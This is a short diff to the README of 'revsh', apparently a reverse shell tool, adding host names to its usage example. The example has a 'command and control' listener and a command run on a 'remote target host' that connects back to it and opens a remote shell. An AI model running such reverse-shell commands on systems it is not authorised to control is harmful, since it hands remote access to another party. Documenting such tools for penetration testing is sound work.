emptymonkey/revsh/README.md

 ## Example ##

-First, setup the local host to be the control host:
+First, setup the local host to be the command and control host (e.g. "monkey"):

 	empty@monkey:~$ revsh -c 192.168.0.42:9999

-Then connect out from the remote target host:
+Then connect out from the remote target host (e.g. "kitty"):

 	target@kitty:~$ ./revsh 192.168.0.42:9999